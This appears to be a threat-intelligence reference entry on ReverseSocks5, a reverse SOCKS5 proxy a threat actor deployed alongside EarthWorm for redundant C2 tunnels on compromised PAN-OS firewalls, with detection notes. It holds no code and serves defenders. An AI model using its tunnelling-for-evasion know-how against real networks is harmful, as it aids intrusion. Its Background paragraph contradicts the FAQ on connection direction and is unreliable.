ReverseSocks5
Open-source reverse SOCKS5 proxy used alongside EarthWorm for redundant C2 tunnels.
Last refreshed: 8 May 2026 · Appears in 1 active topic
Timeline for ReverseSocks5
Deployed by CL-STA-1132 alongside EarthWorm for C2 masking
Cybersecurity: Threats and Defences: CL-STA-1132 exploited PAN-OS since 16 April, log destruction confirmed- What is a reverse SOCKS5 proxy in hacking?
- A reverse SOCKS5 proxy allows an implant on a victim machine to initiate an outbound connection to attacker infrastructure, through which the attacker then routes traffic. This bypasses egress firewall rules that block inbound connections while allowing outbound ones.
- Why do attackers use both EarthWorm and ReverseSocks5 together?
- Using two independent tunnelling tools provides redundant command-and-control: if defenders detect and block one tunnel, the other remains active. CL-STA-1132 deployed both on PAN-OS firewalls to maintain persistent access during their April 2026 intrusion campaign.Source: event
- How do you detect SOCKS5 tunnelling malware?
- Detection relies on identifying unexpected SOCKS5 connection patterns from hosts that don't normally proxy, anomalous binary executions on network appliances, unusual outbound connection volumes, and process lineage analysis — standard tools like ReverseSocks5 and EarthWorm have no unique signatures.
Background
ReverseSocks5 is an open-source reverse SOCKS5 proxy tool used in penetration testing and offensive security operations. Where a standard SOCKS5 tunnel requires the compromised host to initiate an outbound connection to the attacker's server (which may be blocked by egress filtering), a reverse SOCKS5 configuration allows the attacker's server to receive inbound connections initiated by the implant on the victim, then forward attacker traffic back through those connections. This is useful in environments where outbound connections are restricted by firewall rules but inbound-originated tunnels can be established.
Like EarthWorm, ReverseSocks5 is a legitimate red-team tool rather than bespoke malware, which complicates signature-based detection. The tool runs as a portable binary, leaving minimal forensic artefacts on disk if deployed from temporary directories. Detection requires behavioural monitoring for unexpected outbound connection patterns or anomalous binary execution on high-value hosts such as network appliances.
In U#3, CL-STA-1132 deployed ReverseSocks5 alongside EarthWorm on compromised PAN-OS firewalls following exploitation of CVE-2026-0300 . Using two independent tunnelling tools simultaneously provided resilient C2 infrastructure: if defenders blocked one tunnel type or blocked connections to one set of attacker-controlled IPs, the alternate tunnel remained operational. The pair of tools is a recurring combination in Chinese-nexus intrusion sets that prioritise persistence and operational security.